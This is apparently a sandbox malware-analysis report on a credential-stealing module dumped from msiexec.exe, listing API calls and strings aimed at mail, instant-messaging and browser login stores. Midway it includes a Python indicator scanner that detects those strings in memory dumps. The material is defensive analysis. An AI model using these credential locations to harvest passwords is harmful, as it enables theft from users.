                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                        • API String ID: 119022999-2036018995
                                                                                                        • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                        • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                        • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                        • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 393 4085d2-408605 call 44b090 call 4082cd call 410a9c 400 4086d8-4086dd 393->400 401 40860b-40863d memset call 410b62 393->401 404 4086c7-4086cc 401->404 405 408642-40865a call 410a9c 404->405 406 4086d2 404->406 409 4086b1-4086c2 call 410b62 405->409 410 40865c-4086ab memset call 410add call 40848b 405->410 406->400 409->404 410->409
                                                                                                        APIs
                                                                                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                          • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                          • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                          • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                          • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                          • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                          • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                        • memset.MSVCRT ref: 00408620
                                                                                                          • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                        • memset.MSVCRT ref: 00408671
                                                                                                        Strings
                                                                                                        • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                                                        • String ID: Software\Google\Google Talk\Accounts
                                                                                                        • API String ID: 3996936265-1079885057
                                                                                                        • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                                        • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                        • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                                        • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 441 40ce70-40cea1 call 4023b2 call 401e69 446 40cea3-40cea6 441->446 447 40ceb8 441->447 449 40ceb2 446->449 450 40cea8-40ceb0 446->450 448 40cebd-40cecc _strcmpi 447->448 451 40ced3-40cedc call 40cdda 448->451 452 40cece-40ced1 448->452 453 40ceb4-40ceb6 449->453 450->453 454 40cede-40cef7 call 40c3d0 call 40ba28 451->454 458 40cf3f-40cf43 451->458 452->454 453->448 462 40cef9-40cefd 454->462 463 40cf0e 454->463 464 40cf0a-40cf0c 462->464 465 40ceff-40cf08 462->465 466 40cf13-40cf30 call 40affa 463->466 464->466 465->466 468 40cf35-40cf3a call 40c580 466->468 468->458
                                                                                                        APIs
                                                                                                          • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                        • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: strlen$_strcmpimemset
                                                                                                        • String ID: /stext
                                                                                                        • API String ID: 520177685-3817206916
                                                                                                        • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                        • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                        • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                        • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
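The function listings above for the module dumped from msiexec.exe (process 15, image base 0x400000) show the behaviour an analyst would want to detect in other dumps: the routine at 0x410DBB resolves SHGetSpecialFolderPathA from shell32.dll and reads the Explorer "Shell Folders" key, the routine with the "Windows Live Mail" / "Store Root" / "Windows Mail" strings locates local mail stores, the routine at 0x4085D2 enumerates Software\Google\Google Talk\Accounts after collecting the computer and user name, and the routine at 0x40CE70 compares the command line against "/stext" (with "/sort" and "/nosort" handled at 0x40BA28), the switches used to drive a NirSoft-style password-recovery tool non-interactively. The scanner below is an added example, not Joe Sandbox code and not code from the analysed sample: it searches a raw buffer (a process memory dump or a carved PE) for exactly those strings in both ANSI and UTF-16LE form and combines the categories into a verdict. The category names, the verdict rule and the sample buffer are assumptions made for the demonstration; only the indicator strings come from the report.

```python
"""Indicator scan for the mail/IM credential-harvesting routines listed above.

Added example, not code from Joe Sandbox or from the analysed sample. The
indicator strings are the ones the report shows the dumped module referencing;
the category names, verdict rule and SAMPLE_DUMP buffer are constructed here.
"""
import re
import sys
from collections import defaultdict

# category -> strings referenced by the dumped functions in this section
INDICATORS = {
    "mail_store_lookup": [
        "Software\\Microsoft\\Windows Live Mail",
        "\\Microsoft\\Windows Live Mail",
        "\\Microsoft\\Windows Mail",
        "Store Root",
    ],
    "im_account_lookup": ["Software\\Google\\Google Talk\\Accounts"],
    "shell_folder_lookup": [
        "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders",
    ],
    "nirsoft_cli_switch": ["/stext", "/sort", "/nosort"],
}

# The dump calls the *A APIs, so the strings are ANSI, but a process dump also
# carries UTF-16LE copies (command line, registry paths passed to *W APIs),
# so every indicator is searched in both encodings.
ENCODINGS = {"ascii": "ascii", "utf-16le": "utf-16-le"}


def scan(buf: bytes) -> dict:
    """Return {category: [(indicator, offset, encoding), ...]} for every hit."""
    hits = defaultdict(list)
    for category, strings in INDICATORS.items():
        for s in strings:
            for label, codec in ENCODINGS.items():
                for m in re.finditer(re.escape(s.encode(codec)), buf):
                    hits[category].append((s, m.start(), label))
    return dict(hits)


def verdict(hits: dict) -> str:
    """Account-store lookups plus the /stext-style switches together are the
    profile of a password-recovery tool driven non-interactively (assumed rule)."""
    present = {c for c, v in hits.items() if v}
    if "nirsoft_cli_switch" in present and present & {"mail_store_lookup", "im_account_lookup"}:
        return "credential-recovery-tool"
    if present:
        return "suspicious-strings"
    return "clean"


def scan_file(path: str) -> dict:
    with open(path, "rb") as fh:
        return scan(fh.read())


# Constructed test buffer: a few indicators with padding, one of them in UTF-16LE.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"Software\\Microsoft\\Windows Live Mail\x00"
    + b"Store Root\x00"
    + b"/stext\x00"
    + "Software\\Google\\Google Talk\\Accounts".encode("utf-16-le") + b"\x00\x00"
    + b"\x90" * 8
)


if __name__ == "__main__":
    hits = scan_file(sys.argv[1]) if len(sys.argv) > 1 else scan(SAMPLE_DUMP)
    for category, entries in hits.items():
        for s, off, enc in entries:
            print(f"{category:20s} {off:#010x} {enc:8s} {s}")
    print("verdict:", verdict(hits))
```

Run it against the .sdmp file named in each "Memory Dump Source" line (`python scan.py 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp`) to confirm the same string set in another dump; a hit on the switches without any store lookup is reported as "suspicious-strings" only, because "/sort" and "/nosort" are common enough to appear in benign tools.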
                                                                                                        APIs
                                                                                                          • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                        • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                        • String ID:
                                                                                                        • API String ID: 145871493-0
                                                                                                        • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                        • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                        • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                        • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                        APIs
                                                                                                        • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                          • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                          • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                          • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 4165544737-0
                                                                                                        • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                        • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                        • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                        • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary
                                                                                                        • String ID:
                                                                                                        • API String ID: 3664257935-0
                                                                                                        • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                        • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                        • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                        • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                        APIs
                                                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                        • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                        • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                        • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary
                                                                                                        • String ID:
                                                                                                        • API String ID: 3664257935-0
                                                                                                        • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                        • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                        • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                        • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                        APIs
                                                                                                        • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseFind
                                                                                                        • String ID:
                                                                                                        • API String ID: 1863332320-0
                                                                                                        • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                        • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                        • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                        • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                        APIs
                                                                                                        • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                        • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                        • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                        • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                        • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                        • API String ID: 2238633743-192783356
                                                                                                        • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                        • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                        • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                        • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                        • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                        • API String ID: 3963849919-1658304561
                                                                                                        • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                        • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                        • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                        • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@??3@memcpymemset
                                                                                                        • String ID: (yE$(yE$(yE
                                                                                                        • API String ID: 1865533344-362086290
                                                                                                        • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                        • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                        • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                        • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                          • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                          • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                          • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                        • memset.MSVCRT ref: 0040E5B8
                                                                                                        • memset.MSVCRT ref: 0040E5CD
                                                                                                        • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                        • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                        • memset.MSVCRT ref: 0040E6B5
                                                                                                        • memset.MSVCRT ref: 0040E6CC
                                                                                                          • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                          • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                        • memset.MSVCRT ref: 0040E736
                                                                                                        • memset.MSVCRT ref: 0040E74F
                                                                                                        • sprintf.MSVCRT ref: 0040E76D
                                                                                                        • sprintf.MSVCRT ref: 0040E788
                                                                                                        • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                        • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                        • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                        • memset.MSVCRT ref: 0040E858
                                                                                                        • sprintf.MSVCRT ref: 0040E873
                                                                                                        • _strcmpi.MSVCRT ref: 0040E889
                                                                                                        • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                        • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                        • API String ID: 4171719235-3943159138
                                                                                                        • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                        • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                        • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                        • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                        • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                        • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                        • GetDC.USER32 ref: 004104E2
                                                                                                        • strlen.MSVCRT ref: 00410522
                                                                                                        • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                        • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                        • sprintf.MSVCRT ref: 00410640
                                                                                                        • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                        • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                        • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                        • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                        • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                        • String ID: %s:$EDIT$STATIC
                                                                                                        • API String ID: 1703216249-3046471546
                                                                                                        • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                        • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                        • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                        • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004024F5
                                                                                                          • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                        • _mbscpy.MSVCRT(?,00000000,?,?,?,67CB7B60,?,00000000), ref: 00402533
                                                                                                        • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbscpy$QueryValuememset
                                                                                                        • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                        • API String ID: 168965057-606283353
                                                                                                        • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                                        • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
